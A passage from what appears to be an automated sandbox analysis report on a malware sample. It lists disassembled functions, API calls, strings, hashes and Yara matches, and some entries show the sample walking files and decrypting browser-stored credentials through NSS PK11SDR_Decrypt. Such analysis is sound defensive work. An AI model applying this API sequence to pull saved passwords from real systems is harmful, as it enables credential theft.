                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _byteswap_ulong
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 4101233201-598938438
                                                                                                                                              • Opcode ID: c458c1413bb841aa6514dc7626eaaa8278d44447ba5efa9d346495241bd137be
                                                                                                                                              • Instruction ID: ce0580ade687e74ceda4241f375aa74b487c0d2b82855539988fb6294c9c2b97
                                                                                                                                              • Opcode Fuzzy Hash: c458c1413bb841aa6514dc7626eaaa8278d44447ba5efa9d346495241bd137be
                                                                                                                                              • Instruction Fuzzy Hash: B5623434A06205CFEB14CF64C48479ABBF1BF49318F18419DD9416BB92D735E886CBEA
                                                                                                                                              Function 6C72FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C72FD06
                                                                                                                                                • Part of subcall function 6C72F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C72F696
                                                                                                                                                • Part of subcall function 6C72F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C72F789
                                                                                                                                                • Part of subcall function 6C72F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C72F796
                                                                                                                                                • Part of subcall function 6C72F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C72F79F
                                                                                                                                                • Part of subcall function 6C72F670: SECITEM_DupItem_Util.NSS3 ref: 6C72F7F0
                                                                                                                                                • Part of subcall function 6C753440: PK11_GetAllTokens.NSS3 ref: 6C753481
                                                                                                                                                • Part of subcall function 6C753440: PR_SetError.NSS3(00000000,00000000), ref: 6C7534A3
                                                                                                                                                • Part of subcall function 6C753440: TlsGetValue.KERNEL32 ref: 6C75352E
                                                                                                                                                • Part of subcall function 6C753440: EnterCriticalSection.KERNEL32(?), ref: 6C753542
                                                                                                                                                • Part of subcall function 6C753440: PR_Unlock.NSS3(?), ref: 6C75355B
                                                                                                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6C72FDAD
                                                                                                                                                • Part of subcall function 6C75FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C709003,?), ref: 6C75FD91
                                                                                                                                                • Part of subcall function 6C75FD80: PORT_Alloc_Util.NSS3(A4686C76,?), ref: 6C75FDA2
                                                                                                                                                • Part of subcall function 6C75FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C76,?,?), ref: 6C75FDC4
                                                                                                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6C72FE00
                                                                                                                                                • Part of subcall function 6C75FD80: free.MOZGLUE(00000000,?,?), ref: 6C75FDD1
                                                                                                                                                • Part of subcall function 6C74E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C74E5A0
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72FEBB
                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6C72FEC8
                                                                                                                                              • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C72FED3
                                                                                                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C72FF0C
                                                                                                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C72FF23
                                                                                                                                              • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C72FF4D
                                                                                                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C72FFDA
                                                                                                                                              • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C730007
                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C730029
                                                                                                                                              • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C730044
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 138705723-0
                                                                                                                                              • Opcode ID: cd5c0b4a1cf703aecc575312fafd8fe8b49c5bab884e653a2ac78b2e0092ca33
                                                                                                                                              • Instruction ID: 99eb797430de0041427267366979bf52d30af67e13f0dc942945d97f7a451946
                                                                                                                                              • Opcode Fuzzy Hash: cd5c0b4a1cf703aecc575312fafd8fe8b49c5bab884e653a2ac78b2e0092ca33
                                                                                                                                              • Instruction Fuzzy Hash: D8B1E371A04311AFE314CF29C944A6BF7E5FF88318F548A2DE99987A41E734E944CB91
                                                                                                                                              Function 6C727D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C727DDC
                                                                                                                                                • Part of subcall function 6C7607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C708298,?,?,?,6C6FFCE5,?), ref: 6C7607BF
                                                                                                                                                • Part of subcall function 6C7607B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7607E6
                                                                                                                                                • Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C76081B
                                                                                                                                                • Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C760825
                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C727DF3
                                                                                                                                              • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C727F07
                                                                                                                                              • PK11_GetPadMechanism.NSS3(00000000), ref: 6C727F57
                                                                                                                                              • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C727F98
                                                                                                                                              • PK11_FreeSymKey.NSS3(?), ref: 6C727FC9
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C727FDE
                                                                                                                                              • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C728000
                                                                                                                                                • Part of subcall function 6C749430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C727F0C,?,00000000,00000000,00000000,?), ref: 6C74943B
                                                                                                                                                • Part of subcall function 6C749430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C74946B
                                                                                                                                                • Part of subcall function 6C749430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C749546
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C728110
                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6C72811D
                                                                                                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C72822D
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C72823C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1923011919-0
                                                                                                                                              • Opcode ID: 80b182c3ad6e61b06abeade53d0ac903fa5f0e0c3aacf57bd25a144a44c3f40c
                                                                                                                                              • Instruction ID: 86fb24e81ef6cfefb05e5d56a0bfbb55623a6d0be7f8e1252a167890b2b55b95
                                                                                                                                              • Opcode Fuzzy Hash: 80b182c3ad6e61b06abeade53d0ac903fa5f0e0c3aacf57bd25a144a44c3f40c
                                                                                                                                              • Instruction Fuzzy Hash: 2CC17EB1D002599FEB21CF14CE44FEAB7B8AF15348F0481E9E81DA6641E7359E85CFA1
                                                                                                                                              Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • wsprintfA.USER32 ref: 0040EE3E
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                              • String ID: %s\*.*
                                                                                                                                              • API String ID: 180737720-1013718255
                                                                                                                                              • Opcode ID: 134d2789d5210608161f97f2d78f6ee6fe8b499164023051bc74b7a340f70465
                                                                                                                                              • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                                                                                                                              • Opcode Fuzzy Hash: 134d2789d5210608161f97f2d78f6ee6fe8b499164023051bc74b7a340f70465
                                                                                                                                              • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                                                                                                                              Function 0040C920 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040C953
                                                                                                                                              • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,009995F0), ref: 0040C971
                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 0040C98A
                                                                                                                                              • PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C9A5
                                                                                                                                              • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C9EB
                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                                                                                                                              • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                                                                                                                              • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                                                                                                                              • PK11_FreeSlot.NSS3(?), ref: 0040CA61
                                                                                                                                              • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3428224297-0
                                                                                                                                              • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                                                                                                                              • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                                                                                                                              • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                                                                                                                              • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                                                                                                                              Function 6C751CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C751F19
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C752166
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C75228F
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C7523B8
                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C75241C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$Error
                                                                                                                                              • String ID: manufacturer$model$serial$token
                                                                                                                                              • API String ID: 3204416626-1906384322
                                                                                                                                              • Opcode ID: 6df907165ba0ec0e847cc2b185ee499f6966c8e76bb5ef45f412c7f96a5b8922
                                                                                                                                              • Instruction ID: a9408560b008525a12f46fb5d539e2313477b775380a702d5975fcccc73423e9
                                                                                                                                              • Opcode Fuzzy Hash: 6df907165ba0ec0e847cc2b185ee499f6966c8e76bb5ef45f412c7f96a5b8922
                                                                                                                                              • Instruction Fuzzy Hash: 800240A2D0C7C86EF7318671C54C7D77AE09B45328F8D167EC5DE46AC3CBA868988391
                                                                                                                                              Function 6C756C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C701C6F,00000000,00000004,?,?), ref: 6C756C3F
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C701C6F,00000000,00000004,?,?), ref: 6C756C60
                                                                                                                                              • PR_ExplodeTime.NSS3(00000000,6C701C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C701C6F,00000000,00000004,?,?), ref: 6C756C94
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                              • API String ID: 3534712800-180463219
                                                                                                                                              • Opcode ID: db3e68bf4a71967849b5aea855757439aaeacac90a5f8b4cf86ac28410c110bf
                                                                                                                                              • Instruction ID: 4fac6f48f468301f2c162d1a3d078b3860656c26098d1308a2c89cf42eba573d
                                                                                                                                              • Opcode Fuzzy Hash: db3e68bf4a71967849b5aea855757439aaeacac90a5f8b4cf86ac28410c110bf
                                                                                                                                              • Instruction Fuzzy Hash: B0515C72B016494FC70CCDADDC527DAB7DAABA4310F48C23AE842DB785DA78E906C751
                                                                                                                                              Function 6C76BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C76BD48
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C76BD68
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C76BD83
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C76BD9E
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C76BDB9
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C76BDD0
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C76BDEA
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C76BE04
                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C76BE1E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AlgorithmPolicy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2721248240-0
                                                                                                                                              • Opcode ID: 2eae1f969210aedc8c3e1539ddbbd4e7e5e4d041f25c21f7885dfe3be1a642c6
                                                                                                                                              • Instruction ID: e2db0adedac29593919f4952ef9454320226c749b0d03372dafde3b20a55a21c
                                                                                                                                              • Opcode Fuzzy Hash: 2eae1f969210aedc8c3e1539ddbbd4e7e5e4d041f25c21f7885dfe3be1a642c6
                                                                                                                                              • Instruction Fuzzy Hash: 512193BAE1439957FB004657DE4BB8B36789B93B4DF080134FD16BEE42E710B41886A6
                                                                                                                                              Function 6C818D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_CallOnce.NSS3(6C8614E4,6C7CCC70), ref: 6C818D47
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C818D98
                                                                                                                                                • Part of subcall function 6C6F0F00: PR_GetPageSize.NSS3(6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F1B
                                                                                                                                                • Part of subcall function 6C6F0F00: PR_NewLogModule.NSS3(clock,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F25
                                                                                                                                              • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C818E7B
                                                                                                                                              • htons.WSOCK32(?), ref: 6C818EDB
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C818F99
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C81910A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                              • String ID: %u.%u.%u.%u
                                                                                                                                              • API String ID: 1845059423-1542503432
                                                                                                                                              • Opcode ID: 4f215e7b293a90f0689375ed7dcaa36962088ae79c7b065fc2254cedba63d74c
                                                                                                                                              • Instruction ID: b4ac21e3e21f144f9e0da6ac0485e533da5aaf698afd4e25aa20a70be083ff59
                                                                                                                                              • Opcode Fuzzy Hash: 4f215e7b293a90f0689375ed7dcaa36962088ae79c7b065fc2254cedba63d74c
                                                                                                                                              • Instruction Fuzzy Hash: EB02CB329092578FDB24CF19C568366BBF3EF42314F1A8B9AC8915BE91C339D985C790
                                                                                                                                              Function 6C7B9C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcmp.VCRUNTIME140(?,00000000,6C68C52B), ref: 6C7B9D53
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7BA035
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7BA114
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
